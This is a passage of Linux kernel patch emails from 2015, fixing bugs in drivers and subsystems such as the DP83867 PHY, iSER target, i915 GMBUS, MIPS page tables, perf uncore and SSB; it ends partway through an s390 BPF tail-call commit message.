prepare_to_wait(&iadev->timeout_wait, &wait, TASK_UNINTERRUPTIBLE); - schedule_timeout(50); + schedule_timeout(msecs_to_jiffies(500)); finish_wait(&iadev->timeout_wait, &wait); spin_lock_irqsave(&iadev->tx_lock, flags); while((skb = skb_dequeue(&iadev->tx_backlog))) { From ac7ba51c215db5739eb640f2f26025ced8668285 Mon Sep 17 00:00:00 2001 From: Dan Murphy Date: Mon, 8 Jun 2015 14:30:55 -0500 Subject: [PATCH 785/872] net: phy: dp83867: Fix device tree entries Fix the device tree entries to modify the '_' to '-'. Also changes the names of the internal delay properties from -int- to -internal- as the -int- appeared as a keyword. Signed-off-by: Dan Murphy Reviewed-by: Florian Fainelli Signed-off-by: David S. 
Miller --- .../devicetree/bindings/net/ti,dp83867.txt | 18 ++++++++++++------ drivers/net/phy/dp83867.c | 6 +++--- 2 files changed, 15 insertions(+), 9 deletions(-) diff --git a/Documentation/devicetree/bindings/net/ti,dp83867.txt b/Documentation/devicetree/bindings/net/ti,dp83867.txt index 46bb67a222ea..58d935b58598 100644 --- a/Documentation/devicetree/bindings/net/ti,dp83867.txt +++ b/Documentation/devicetree/bindings/net/ti,dp83867.txt @@ -2,18 +2,24 @@ Required properties: - reg - The ID number for the phy, usually a small integer - - ti,rx_int_delay - RGMII Recieve Clock Delay - see dt-bindings/net/ti-dp83867.h + - ti,rx-internal-delay - RGMII Recieve Clock Delay - see dt-bindings/net/ti-dp83867.h for applicable values - - ti,tx_int_delay - RGMII Transmit Clock Delay - see dt-bindings/net/ti-dp83867.h + - ti,tx-internal-delay - RGMII Transmit Clock Delay - see dt-bindings/net/ti-dp83867.h for applicable values - - ti,fifo_depth - Transmitt FIFO depth- see dt-bindings/net/ti-dp83867.h + - ti,fifo-depth - Transmitt FIFO depth- see dt-bindings/net/ti-dp83867.h for applicable values +Default child nodes are standard Ethernet PHY device +nodes as described in Documentation/devicetree/bindings/net/phy.txt + Example: ethernet-phy@0 { reg = <0>; - ti,rx_int_delay = ; - ti,tx_int_delay = ; - ti,fifo_depth = ; + ti,rx-internal-delay = ; + ti,tx-internal-delay = ; + ti,fifo-depth = ; }; + +Datasheet can be found: +http://www.ti.com/product/DP83867IR/datasheet diff --git a/drivers/net/phy/dp83867.c b/drivers/net/phy/dp83867.c index ef0b4eb15f8d..c7a12e2e07b7 100644 --- a/drivers/net/phy/dp83867.c +++ b/drivers/net/phy/dp83867.c @@ -113,17 +113,17 @@ static int dp83867_of_init(struct phy_device *phydev) if (!phydev->dev.of_node) return -ENODEV; - ret = of_property_read_u32(of_node, "ti,rx_int_delay", + ret = of_property_read_u32(of_node, "ti,rx-internal-delay", &dp83867->rx_id_delay); if (ret) return ret; - ret = of_property_read_u32(of_node, "ti,tx_int_delay", + ret = of_property_read_u32(of_node, "ti,tx-internal-delay", &dp83867->tx_id_delay); if (ret) return ret; - ret = of_property_read_u32(of_node, "ti,fifo_depth", + ret = of_property_read_u32(of_node, "ti,fifo-depth", &dp83867->fifo_depth); if (ret) return ret; From 2f4eb6a80e57845ef6f3f7d1cdaaec7a6ab480a9 Mon Sep 17 00:00:00 2001 From: Jon Mason Date: Sun, 5 Apr 2015 14:57:22 -0400 Subject: [PATCH 786/872] ntb: iounmap MW reg and vbase in error path The MW regbase and vbase(s) were not being freed if an error occurred in the vbase allocation loop. This is corrected by updating the error path for the allocation loop to err4. Reported-by: Julia Lawall Signed-off-by: Jon Mason --- drivers/ntb/ntb_hw.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/ntb/ntb_hw.c b/drivers/ntb/ntb_hw.c index cd29b1038c5e..b5c8707f4ac7 100644 --- a/drivers/ntb/ntb_hw.c +++ b/drivers/ntb/ntb_hw.c @@ -1778,7 +1778,7 @@ static int ntb_pci_probe(struct pci_dev *pdev, const struct pci_device_id *id) dev_warn(&pdev->dev, "Cannot remap BAR %d\n", MW_TO_BAR(i)); rc = -EIO; - goto err3; + goto err4; } } From 132bd96bc56f9cafd24b71de389984d0e83a0956 Mon Sep 17 00:00:00 2001 From: Dave Airlie Date: Tue, 9 Jun 2015 13:39:31 +1000 Subject: [PATCH 787/872] ALSA: hda - fix number of devices query on hotplug The new regmap code seems to cache this, which isn't helpful for the hotplug dock situation where this gets updated. Use the uncached query for this. 
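Condensed, the post-patch helper reads roughly as follows (a sketch only: the widget-capability guards at the top of the real function are omitted, the sketch_ prefix is not in the driver, and the uncached helper is the one named in the hunk below):

        /* Sketch: query the hardware directly instead of the regmap cache, so a
         * dock (un)plug that changes the device list is reflected immediately. */
        static unsigned int sketch_get_num_devices(struct hda_codec *codec,
                                                   hda_nid_t nid)
        {
                unsigned int parm;

                parm = snd_hdac_read_parm_uncached(&codec->core, nid,
                                                   AC_PAR_DEVLIST_LEN);
                if (parm == -1 && codec->bus->rirb_error)
                        parm = 0;
                return parm & AC_DEV_LIST_LEN_MASK;
        }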
Signed-off-by: Dave Airlie Signed-off-by: Takashi Iwai --- sound/pci/hda/hda_codec.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/sound/pci/hda/hda_codec.c b/sound/pci/hda/hda_codec.c index b49feff0a319..b7782212dd64 100644 --- a/sound/pci/hda/hda_codec.c +++ b/sound/pci/hda/hda_codec.c @@ -436,7 +436,7 @@ static unsigned int get_num_devices(struct hda_codec *codec, hda_nid_t nid) get_wcaps_type(wcaps) != AC_WID_PIN) return 0; - parm = snd_hda_param_read(codec, nid, AC_PAR_DEVLIST_LEN); + parm = snd_hdac_read_parm_uncached(&codec->core, nid, AC_PAR_DEVLIST_LEN); if (parm == -1 && codec->bus->rirb_error) parm = 0; return parm & AC_DEV_LIST_LEN_MASK; From 9253e667ab50fd4611a60e1cdd6a6e05a1d91cf1 Mon Sep 17 00:00:00 2001 From: Sagi Grimberg Date: Thu, 4 Jun 2015 19:49:19 +0300 Subject: [PATCH 788/872] iser-target: Fix variable-length response error completion Since commit "2426bd456a6 target: Report correct response ..." we might get a command with data_size that does not fit to the number of allocated data sg elements. Given that we rely on cmd t_data_nents which might be different than the data_size, we sometimes receive local length error completion. The correct approach would be to take the command data_size into account when constructing the ib sg_list. Signed-off-by: Sagi Grimberg Signed-off-by: Jenny Falkovich Cc: stable@vger.kernel.org # 3.16+ Signed-off-by: Nicholas Bellinger --- drivers/infiniband/ulp/isert/ib_isert.c | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/drivers/infiniband/ulp/isert/ib_isert.c b/drivers/infiniband/ulp/isert/ib_isert.c index 3f40319a55da..2c86bd1f1417 100644 --- a/drivers/infiniband/ulp/isert/ib_isert.c +++ b/drivers/infiniband/ulp/isert/ib_isert.c @@ -2380,7 +2380,6 @@ isert_build_rdma_wr(struct isert_conn *isert_conn, struct isert_cmd *isert_cmd, page_off = offset % PAGE_SIZE; send_wr->sg_list = ib_sge; - send_wr->num_sge = sg_nents; send_wr->wr_id = (uintptr_t)&isert_cmd->tx_desc; /* * Perform mapping of TCM scatterlist memory ib_sge dma_addr. @@ -2400,14 +2399,17 @@ isert_build_rdma_wr(struct isert_conn *isert_conn, struct isert_cmd *isert_cmd, ib_sge->addr, ib_sge->length, ib_sge->lkey); page_off = 0; data_left -= ib_sge->length; + if (!data_left) + break; ib_sge++; isert_dbg("Incrementing ib_sge pointer to %p\n", ib_sge); } + send_wr->num_sge = ++i; isert_dbg("Set outgoing sg_list: %p num_sg: %u from TCM SGLs\n", send_wr->sg_list, send_wr->num_sge); - return sg_nents; + return send_wr->num_sge; } static int From 2f1b6b7d9a815f341b18dfd26a363f37d4d3c96a Mon Sep 17 00:00:00 2001 From: Sagi Grimberg Date: Thu, 4 Jun 2015 19:49:20 +0300 Subject: [PATCH 789/872] iser-target: release stale iser connections When receiving a new iser connect request we serialize the pending requests by adding the newly created iser connection to the np accept list and let the login thread process the connect request one by one (np_accept_wait). In case we received a disconnect request before the iser_conn has begun processing (still linked in np_accept_list) we should detach it from the list and clean it up and not have the login thread process a stale connection. We do it only when the connection state is not already terminating (initiator driven disconnect) as this might lead us to access np_accept_mutex after the np was released in live shutdown scenarios. 
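In outline, the disconnect-path handling added here does the following (a sketch mirroring the hunks below; the goto-based flow of the real handler is written as an if for readability, and isert_np comes from cma_id->context as in the existing code):

        mutex_lock(&isert_conn->mutex);
        terminating = (isert_conn->state == ISER_CONN_TERMINATING);
        isert_conn_terminate(isert_conn);
        mutex_unlock(&isert_conn->mutex);

        complete(&isert_conn->wait);

        if (!terminating) {
                /* Still parked on np_accept_list: the login thread will never
                 * pick this connection up, so detach and release it here. */
                mutex_lock(&isert_np->np_accept_mutex);
                if (!list_empty(&isert_conn->accept_node)) {
                        list_del_init(&isert_conn->accept_node);
                        isert_put_conn(isert_conn);
                        queue_work(isert_release_wq, &isert_conn->release_work);
                }
                mutex_unlock(&isert_np->np_accept_mutex);
        }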
Signed-off-by: Sagi Grimberg Signed-off-by: Jenny Falkovich Cc: stable@vger.kernel.org # 3.10+ Signed-off-by: Nicholas Bellinger --- drivers/infiniband/ulp/isert/ib_isert.c | 18 +++++++++++++++++- 1 file changed, 17 insertions(+), 1 deletion(-) diff --git a/drivers/infiniband/ulp/isert/ib_isert.c b/drivers/infiniband/ulp/isert/ib_isert.c index 2c86bd1f1417..bad1f5d32227 100644 --- a/drivers/infiniband/ulp/isert/ib_isert.c +++ b/drivers/infiniband/ulp/isert/ib_isert.c @@ -65,6 +65,8 @@ static int isert_rdma_accept(struct isert_conn *isert_conn); struct rdma_cm_id *isert_setup_id(struct isert_np *isert_np); +static void isert_release_work(struct work_struct *work); + static inline bool isert_prot_cmd(struct isert_conn *conn, struct se_cmd *cmd) { @@ -648,6 +650,7 @@ isert_init_conn(struct isert_conn *isert_conn) mutex_init(&isert_conn->mutex); spin_lock_init(&isert_conn->pool_lock); INIT_LIST_HEAD(&isert_conn->fr_pool); + INIT_WORK(&isert_conn->release_work, isert_release_work); } static void @@ -925,6 +928,7 @@ isert_disconnected_handler(struct rdma_cm_id *cma_id, { struct isert_np *isert_np = cma_id->context; struct isert_conn *isert_conn; + bool terminating = false; if (isert_np->np_cm_id == cma_id) return isert_np_cma_handler(cma_id->context, event); @@ -932,12 +936,25 @@ isert_disconnected_handler(struct rdma_cm_id *cma_id, isert_conn = cma_id->qp->qp_context; mutex_lock(&isert_conn->mutex); + terminating = (isert_conn->state == ISER_CONN_TERMINATING); isert_conn_terminate(isert_conn); mutex_unlock(&isert_conn->mutex); isert_info("conn %p completing wait\n", isert_conn); complete(&isert_conn->wait); + if (terminating) + goto out; + + mutex_lock(&isert_np->np_accept_mutex); + if (!list_empty(&isert_conn->accept_node)) { + list_del_init(&isert_conn->accept_node); + isert_put_conn(isert_conn); + queue_work(isert_release_wq, &isert_conn->release_work); + } + mutex_unlock(&isert_np->np_accept_mutex); + +out: return 0; } @@ -3368,7 +3385,6 @@ static void isert_wait_conn(struct iscsi_conn *conn) isert_wait4flush(isert_conn); isert_wait4logout(isert_conn); - INIT_WORK(&isert_conn->release_work, isert_release_work); queue_work(isert_release_wq, &isert_conn->release_work); } From 524630d5824c7a75aab568c6bd1423fd748cd3bb Mon Sep 17 00:00:00 2001 From: Sagi Grimberg Date: Thu, 4 Jun 2015 19:49:21 +0300 Subject: [PATCH 790/872] iser-target: Fix possible use-after-free iser connection termination process happens in 2 stages: - isert_wait_conn: - resumes rdma disconnect - wait for session commands - wait for flush completions (post a marked wr to signal we are done) - wait for logout completion - queue work for connection cleanup (depends on disconnected/timewait events) - isert_free_conn - last reference put on the connection In case we are terminating during IOs, we might be posting send/recv requests after we posted the last work request which might lead to a use-after-free condition in isert_handle_wc. After we posted the last wr in isert_wait_conn we are guaranteed that no successful completions will follow (meaning no new work request posts may happen) but other flush errors might still come. So before we put the last reference on the connection, we repeat the process of posting a marked work request (isert_wait4flush) in order to make sure all pending completions were flushed. 
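The resulting teardown path, condensed (this is the post-patch isert_free_conn() from the single hunk below, with an explanatory comment added):

        static void isert_free_conn(struct iscsi_conn *conn)
        {
                struct isert_conn *isert_conn = conn->context;

                /* Drain any remaining flush-error completions so isert_handle_wc()
                 * can no longer touch the connection after the final put. */
                isert_wait4flush(isert_conn);
                isert_put_conn(isert_conn);
        }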
Signed-off-by: Sagi Grimberg Signed-off-by: Jenny Falkovich Cc: stable@vger.kernel.org # 3.10+ Signed-off-by: Nicholas Bellinger --- drivers/infiniband/ulp/isert/ib_isert.c | 1 + 1 file changed, 1 insertion(+) diff --git a/drivers/infiniband/ulp/isert/ib_isert.c b/drivers/infiniband/ulp/isert/ib_isert.c index bad1f5d32227..575a072d765f 100644 --- a/drivers/infiniband/ulp/isert/ib_isert.c +++ b/drivers/infiniband/ulp/isert/ib_isert.c @@ -3392,6 +3392,7 @@ static void isert_free_conn(struct iscsi_conn *conn) { struct isert_conn *isert_conn = conn->context; + isert_wait4flush(isert_conn); isert_put_conn(isert_conn); } From 3f5f1554ee715639e78d9be87623ee82772537e0 Mon Sep 17 00:00:00 2001 From: Jani Nikula Date: Tue, 2 Jun 2015 19:21:15 +0300 Subject: [PATCH 791/872] drm/i915: Fix DDC probe for passive adapters MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Passive DP->DVI/HDMI dongles on DP++ ports show up to the system as HDMI devices, as they do not have a sink device in them to respond to any AUX traffic. When probing these dongles over the DDC, sometimes they will NAK the first attempt even though the transaction is valid and they support the DDC protocol. The retry loop inside of drm_do_probe_ddc_edid() would normally catch this case and try the transaction again, resulting in success. That, however, was thwarted by the fix for [1]: commit 9292f37e1f5c79400254dca46f83313488093825 Author: Eugeni Dodonov Date: Thu Jan 5 09:34:28 2012 -0200 drm: give up on edid retries when i2c bus is not responding This added code to exit immediately if the return code from the i2c_transfer function was -ENXIO in order to reduce the amount of time spent in waiting for unresponsive or disconnected devices. That was possible because the underlying i2c bit banging algorithm had retries of its own (which, of course, were part of the reason for the bug the commit fixes). Since its introduction in commit f899fc64cda8569d0529452aafc0da31c042df2e Author: Chris Wilson Date: Tue Jul 20 15:44:45 2010 -0700 drm/i915: use GMBUS to manage i2c links we've been flipping back and forth enabling the GMBUS transfers, but we've settled since then. The GMBUS implementation does not do any retries, however, bailing out of the drm_do_probe_ddc_edid() retry loop on first encounter of -ENXIO. This, combined with Eugeni's commit, broke the retry on -ENXIO. Retry GMBUS once on -ENXIO on first message to mitigate the issues with passive adapters. This patch is based on the work, and commit message, by Todd Previte . [1] https://bugs.freedesktop.org/show_bug.cgi?id=41059 v2: Don't retry if using bit banging. v3: Move retry within gmbux_xfer, retry only on first message. v4: Initialize GMBUS0 on retry (Ville). v5: Take index reads into account (Ville). 
Bugzilla: https://bugs.freedesktop.org/show_bug.cgi?id=85924 Cc: Todd Previte Cc: stable@vger.kernel.org Tested-by: Oliver Grafe (v2) Tested-by: Jim Bride Reviewed-by: Ville Syrjälä Signed-off-by: Jani Nikula --- drivers/gpu/drm/i915/intel_i2c.c | 20 +++++++++++++++++--- 1 file changed, 17 insertions(+), 3 deletions(-) diff --git a/drivers/gpu/drm/i915/intel_i2c.c b/drivers/gpu/drm/i915/intel_i2c.c index 56e437e31580..ae628001fd97 100644 --- a/drivers/gpu/drm/i915/intel_i2c.c +++ b/drivers/gpu/drm/i915/intel_i2c.c @@ -435,7 +435,7 @@ gmbus_xfer(struct i2c_adapter *adapter, struct intel_gmbus, adapter); struct drm_i915_private *dev_priv = bus->dev_priv; - int i, reg_offset; + int i = 0, inc, try = 0, reg_offset; int ret = 0; intel_aux_display_runtime_get(dev_priv); @@ -448,12 +448,14 @@ gmbus_xfer(struct i2c_adapter *adapter, reg_offset = dev_priv->gpio_mmio_base; +retry: I915_WRITE(GMBUS0 + reg_offset, bus->reg0); - for (i = 0; i < num; i++) { + for (; i < num; i += inc) { + inc = 1; if (gmbus_is_index_read(msgs, i, num)) { ret = gmbus_xfer_index_read(dev_priv, &msgs[i]); - i += 1; /* set i to the index of the read xfer */ + inc = 2; /* an index read is two msgs */ } else if (msgs[i].flags & I2C_M_RD) { ret = gmbus_xfer_read(dev_priv, &msgs[i], 0); } else { @@ -525,6 +527,18 @@ gmbus_xfer(struct i2c_adapter *adapter, adapter->name, msgs[i].addr, (msgs[i].flags & I2C_M_RD) ? 'r' : 'w', msgs[i].len); + /* + * Passive adapters sometimes NAK the first probe. Retry the first + * message once on -ENXIO for GMBUS transfers; the bit banging algorithm + * has retries internally. See also the retry loop in + * drm_do_probe_ddc_edid, which bails out on the first -ENXIO. + */ + if (ret == -ENXIO && i == 0 && try++ == 0) { + DRM_DEBUG_KMS("GMBUS [%s] NAK on first message, retry\n", + adapter->name); + goto retry; + } + goto out; timeout: From d7b631419b3d230a4d383a8c5f5f294f3bc564f9 Mon Sep 17 00:00:00 2001 From: Markos Chandras Date: Fri, 29 May 2015 14:43:52 +0100 Subject: [PATCH 792/872] MIPS: pgtable-bits: Fix XPA damage to R6 definitions. Commit be0c37c985ed ("MIPS: Rearrange PTE bits into fixed positions.") rearranged the PTE bits into fixed positions in preparation for the XPA support. However, this patch broke R6 since it only took R2 cores into consideration for the RI/XI bits leading to boot failures. We fix this by adding the missing CONFIG_CPU_MIPSR6 definitions Fixes: be0c37c985ed ("MIPS: Rearrange PTE bits into fixed positions.") Cc: Steven J. 
Hill Cc: linux-mips@linux-mips.org Patchwork: https://patchwork.linux-mips.org/patch/10208/ Signed-off-by: Markos Chandras Signed-off-by: Ralf Baechle --- arch/mips/include/asm/pgtable-bits.h | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/arch/mips/include/asm/pgtable-bits.h b/arch/mips/include/asm/pgtable-bits.h index 18ae5ddef118..c28a8499aec7 100644 --- a/arch/mips/include/asm/pgtable-bits.h +++ b/arch/mips/include/asm/pgtable-bits.h @@ -113,7 +113,7 @@ #define _PAGE_PRESENT_SHIFT 0 #define _PAGE_PRESENT (1 << _PAGE_PRESENT_SHIFT) /* R2 or later cores check for RI/XI support to determine _PAGE_READ */ -#ifdef CONFIG_CPU_MIPSR2 +#if defined(CONFIG_CPU_MIPSR2) || defined(CONFIG_CPU_MIPSR6) #define _PAGE_WRITE_SHIFT (_PAGE_PRESENT_SHIFT + 1) #define _PAGE_WRITE (1 << _PAGE_WRITE_SHIFT) #else @@ -135,16 +135,16 @@ #define _PAGE_SPLITTING (1 << _PAGE_SPLITTING_SHIFT) /* Only R2 or newer cores have the XI bit */ -#ifdef CONFIG_CPU_MIPSR2 +#if defined(CONFIG_CPU_MIPSR2) || defined(CONFIG_CPU_MIPSR6) #define _PAGE_NO_EXEC_SHIFT (_PAGE_SPLITTING_SHIFT + 1) #else #define _PAGE_GLOBAL_SHIFT (_PAGE_SPLITTING_SHIFT + 1) #define _PAGE_GLOBAL (1 << _PAGE_GLOBAL_SHIFT) -#endif /* CONFIG_CPU_MIPSR2 */ +#endif /* CONFIG_CPU_MIPSR2 || CONFIG_CPU_MIPSR6 */ #endif /* CONFIG_64BIT && CONFIG_MIPS_HUGE_TLB_SUPPORT */ -#ifdef CONFIG_CPU_MIPSR2 +#if defined(CONFIG_CPU_MIPSR2) || defined(CONFIG_CPU_MIPSR6) /* XI - page cannot be executed */ #ifndef _PAGE_NO_EXEC_SHIFT #define _PAGE_NO_EXEC_SHIFT (_PAGE_MODIFIED_SHIFT + 1) @@ -160,10 +160,10 @@ #define _PAGE_GLOBAL_SHIFT (_PAGE_NO_READ_SHIFT + 1) #define _PAGE_GLOBAL (1 << _PAGE_GLOBAL_SHIFT) -#else /* !CONFIG_CPU_MIPSR2 */ +#else /* !CONFIG_CPU_MIPSR2 && !CONFIG_CPU_MIPSR6 */ #define _PAGE_GLOBAL_SHIFT (_PAGE_MODIFIED_SHIFT + 1) #define _PAGE_GLOBAL (1 << _PAGE_GLOBAL_SHIFT) -#endif /* CONFIG_CPU_MIPSR2 */ +#endif /* CONFIG_CPU_MIPSR2 || CONFIG_CPU_MIPSR6 */ #define _PAGE_VALID_SHIFT (_PAGE_GLOBAL_SHIFT + 1) #define _PAGE_VALID (1 << _PAGE_VALID_SHIFT) @@ -205,7 +205,7 @@ */ static inline uint64_t pte_to_entrylo(unsigned long pte_val) { -#ifdef CONFIG_CPU_MIPSR2 +#if defined(CONFIG_CPU_MIPSR2) || defined(CONFIG_CPU_MIPSR6) if (cpu_has_rixi) { int sa; #ifdef CONFIG_32BIT From 15c1247953e8a45232ed5a5540f291d2d0a77665 Mon Sep 17 00:00:00 2001 From: Ingo Molnar Date: Tue, 9 Jun 2015 11:40:28 +0200 Subject: [PATCH 793/872] Revert "perf/x86/intel/uncore: Move uncore_box_init() out of driver initialization" This reverts commit c05199e5a57a579fea1e8fa65e2b511ceb524ffc. Vince Weaver reported the following crash while perf fuzzing: [ 79.473121] kernel BUG at mm/vmalloc.c:1335! [ 79.694391] Call Trace: [ 79.696997] [ 79.699090] [] get_vm_area_caller+0x40/0x50 [ 79.705505] [] ? snb_uncore_imc_init_box+0x6d/0x90 [ 79.712414] [] __ioremap_caller+0x195/0x350 [ 79.718610] [] ? snb_uncore_imc_init_box+0x6d/0x90 [ 79.725462] [] ? debug_object_activate+0x14b/0x1e0 [ 79.732346] [] ioremap_nocache+0x17/0x20 [ 79.738283] [] snb_uncore_imc_init_box+0x6d/0x90 [ 79.744945] [] snb_uncore_imc_event_start+0xb7/0x110 [ 79.752020] [] snb_uncore_imc_event_add+0x47/0x60 [ 79.758832] [] event_sched_in.isra.85+0xfb/0x330 [ 79.765519] [] group_sched_in+0x6f/0x1e0 [ 79.771481] [] ? native_sched_clock+0x2a/0x90 [ 79.777858] [] __perf_event_enable+0x25c/0x2a0 [ 79.784418] [] ? tick_nohz_irq_exit+0x29/0x30 [ 79.790820] [] ? 
cpu_clock_event_start+0x40/0x40 [ 79.797546] [] remote_function+0x50/0x60 [ 79.803535] [] flush_smp_call_function_queue+0x81/0x180 [ 79.810840] [] generic_smp_call_function_single_interrupt+0x13/0x60 [ 79.819328] [] smp_trace_call_function_single_interrupt+0x38/0xc0 [ 79.827614] [] trace_call_function_single_interrupt+0x6e/0x80 [ 79.835465] [ 79.837543] [] ? cpuidle_enter_state+0x65/0x160 [ 79.844377] [] ? cpuidle_enter_state+0x51/0x160 [ 79.851015] [] cpuidle_enter+0x17/0x20 [ 79.856791] [] cpu_startup_entry+0x399/0x440 [ 79.863165] [] rest_init+0xbb/0xd0 The offending commit is clearly confused as it moves heavy initialization work into IPI context. Revert it. Reported-by: Vince Weaver Acked-by: Peter Zijlstra (Intel) Cc: Kan Liang Cc: Arnaldo Carvalho de Melo Cc: Stephane Eranian Cc: Yan, Zheng Cc: linux-kernel@vger.kernel.org Signed-off-by: Ingo Molnar --- arch/x86/kernel/cpu/perf_event_intel_uncore.c | 9 +++++++-- arch/x86/kernel/cpu/perf_event_intel_uncore.h | 18 ++++++++---------- 2 files changed, 15 insertions(+), 12 deletions(-) diff --git a/arch/x86/kernel/cpu/perf_event_intel_uncore.c b/arch/x86/kernel/cpu/perf_event_intel_uncore.c index dd319e59246b..90b7c501c95b 100644 --- a/arch/x86/kernel/cpu/perf_event_intel_uncore.c +++ b/arch/x86/kernel/cpu/perf_event_intel_uncore.c @@ -839,6 +839,7 @@ static int uncore_pci_probe(struct pci_dev *pdev, const struct pci_device_id *id box->phys_id = phys_id; box->pci_dev = pdev; box->pmu = pmu; + uncore_box_init(box); pci_set_drvdata(pdev, box); raw_spin_lock(&uncore_box_lock); @@ -1002,8 +1003,10 @@ static int uncore_cpu_starting(int cpu) pmu = &type->pmus[j]; box = *per_cpu_ptr(pmu->box, cpu); /* called by uncore_cpu_init? */ - if (box && box->phys_id >= 0) + if (box && box->phys_id >= 0) { + uncore_box_init(box); continue; + } for_each_online_cpu(k) { exist = *per_cpu_ptr(pmu->box, k); @@ -1019,8 +1022,10 @@ static int uncore_cpu_starting(int cpu) } } - if (box) + if (box) { box->phys_id = phys_id; + uncore_box_init(box); + } } } return 0; diff --git a/arch/x86/kernel/cpu/perf_event_intel_uncore.h b/arch/x86/kernel/cpu/perf_event_intel_uncore.h index f789ec9a0133..ceac8f5dc018 100644 --- a/arch/x86/kernel/cpu/perf_event_intel_uncore.h +++ b/arch/x86/kernel/cpu/perf_event_intel_uncore.h @@ -258,14 +258,6 @@ static inline int uncore_num_counters(struct intel_uncore_box *box) return box->pmu->type->num_counters; } -static inline void uncore_box_init(struct intel_uncore_box *box) -{ - if (!test_and_set_bit(UNCORE_BOX_FLAG_INITIATED, &box->flags)) { - if (box->pmu->type->ops->init_box) - box->pmu->type->ops->init_box(box); - } -} - static inline void uncore_disable_box(struct intel_uncore_box *box) { if (box->pmu->type->ops->disable_box) @@ -274,8 +266,6 @@ static inline void uncore_disable_box(struct intel_uncore_box *box) static inline void uncore_enable_box(struct intel_uncore_box *box) { - uncore_box_init(box); - if (box->pmu->type->ops->enable_box) box->pmu->type->ops->enable_box(box); } @@ -298,6 +288,14 @@ static inline u64 uncore_read_counter(struct intel_uncore_box *box, return box->pmu->type->ops->read_counter(box, event); } +static inline void uncore_box_init(struct intel_uncore_box *box) +{ + if (!test_and_set_bit(UNCORE_BOX_FLAG_INITIATED, &box->flags)) { + if (box->pmu->type->ops->init_box) + box->pmu->type->ops->init_box(box); + } +} + static inline bool uncore_box_is_fake(struct intel_uncore_box *box) { return (box->phys_id < 0); From bd00c606a6f60ca015a62bdbf671eadd48a4ca82 Mon Sep 17 00:00:00 2001 From: David Woodhouse Date: 
Tue, 9 Jun 2015 15:06:55 +0100 Subject: [PATCH 794/872] iommu/vt-d: Change PASID support to bit 40 of Extended Capability Register The existing hardware implementations with PASID support advertised in bit 28? Forget them. They do not exist. Bit 28 means nothing. When we have something that works, it'll use bit 40. Do not attempt to infer anything meaningful from bit 28. This will be reflected in an updated VT-d spec in the extremely near future. Signed-off-by: David Woodhouse --- include/linux/intel-iommu.h | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/include/linux/intel-iommu.h b/include/linux/intel-iommu.h index 796ef9645827..a240e61a7700 100644 --- a/include/linux/intel-iommu.h +++ b/include/linux/intel-iommu.h @@ -115,13 +115,14 @@ static inline void dmar_writeq(void __iomem *addr, u64 val) * Extended Capability Register */ +#define ecap_pasid(e) ((e >> 40) & 0x1) #define ecap_pss(e) ((e >> 35) & 0x1f) #define ecap_eafs(e) ((e >> 34) & 0x1) #define ecap_nwfs(e) ((e >> 33) & 0x1) #define ecap_srs(e) ((e >> 31) & 0x1) #define ecap_ers(e) ((e >> 30) & 0x1) #define ecap_prs(e) ((e >> 29) & 0x1) -#define ecap_pasid(e) ((e >> 28) & 0x1) +/* PASID support used to be on bit 28 */ #define ecap_dis(e) ((e >> 27) & 0x1) #define ecap_nest(e) ((e >> 26) & 0x1) #define ecap_mts(e) ((e >> 25) & 0x1) From 36f6ea2b21cce09f4f85a8fca007aa6a927804f7 Mon Sep 17 00:00:00 2001 From: Hauke Mehrtens Date: Sun, 7 Jun 2015 01:52:51 +0200 Subject: [PATCH 795/872] SSB: Fix handling of ssb_pmu_get_alp_clock() Dan Carpenter reported missing brackets which resulted in reading a wrong crystalfreq value. I also noticed that the result of this function is ignored. Reported-By: Dan Carpenter Signed-off-by: Hauke Mehrtens Signed-off-by: Michael Buesch Cc: davem@davemloft.net Cc: netdev@vger.kernel.org Cc: linux-mips@linux-mips.org Patchwork: https://patchwork.linux-mips.org/patch/10536/ Signed-off-by: Ralf Baechle --- drivers/ssb/driver_chipcommon_pmu.c | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/drivers/ssb/driver_chipcommon_pmu.c b/drivers/ssb/driver_chipcommon_pmu.c index 09428412139e..c5352ea4821e 100644 --- a/drivers/ssb/driver_chipcommon_pmu.c +++ b/drivers/ssb/driver_chipcommon_pmu.c @@ -621,8 +621,8 @@ static u32 ssb_pmu_get_alp_clock_clk0(struct ssb_chipcommon *cc) u32 crystalfreq; const struct pmu0_plltab_entry *e = NULL; - crystalfreq = chipco_read32(cc, SSB_CHIPCO_PMU_CTL) & - SSB_CHIPCO_PMU_CTL_XTALFREQ >> SSB_CHIPCO_PMU_CTL_XTALFREQ_SHIFT; + crystalfreq = (chipco_read32(cc, SSB_CHIPCO_PMU_CTL) & + SSB_CHIPCO_PMU_CTL_XTALFREQ) >> SSB_CHIPCO_PMU_CTL_XTALFREQ_SHIFT; e = pmu0_plltab_find_entry(crystalfreq); BUG_ON(!e); return e->freq * 1000; @@ -634,7 +634,7 @@ u32 ssb_pmu_get_alp_clock(struct ssb_chipcommon *cc) switch (bus->chip_id) { case 0x5354: - ssb_pmu_get_alp_clock_clk0(cc); + return ssb_pmu_get_alp_clock_clk0(cc); default: ssb_err("ERROR: PMU alp clock unknown for device %04X\n", bus->chip_id); From 6651ee070b3124fe9b9db383e3a895a0e4aded65 Mon Sep 17 00:00:00 2001 From: Michael Holzheu Date: Mon, 8 Jun 2015 21:51:06 -0700 Subject: [PATCH 796/872] s390/bpf: implement bpf_tail_call() helper bpf_tail_call() arguments: - ctx......: Context pointer - jmp_table: One of BPF_MAP_TYPE_PROG_ARRAY maps used as the jump table - index....: Index in the jump table In this implementation s390x JIT does stack unwinding and jumps into the callee program prologue. Caller and callee use the same stack. 
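Expressed as C, the emitted sequence implements the usual eBPF tail-call contract (a consolidation of the comments in the listing and JIT hunks below, not literal source):

        if (index >= array->map.max_entries)
                goto out;
        if (tail_call_cnt++ > MAX_TAIL_CALL_CNT)
                goto out;
        prog = array->prog[index];
        if (prog == NULL)
                goto out;
        /* Restore the saved registers, then jump into the callee just past its
         * register-saving prologue (tail_call_start), reusing the same stack. */
        goto *(prog->bpf_func + tail_call_start);
out:
        /* fall through to the next instruction of the calling program */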
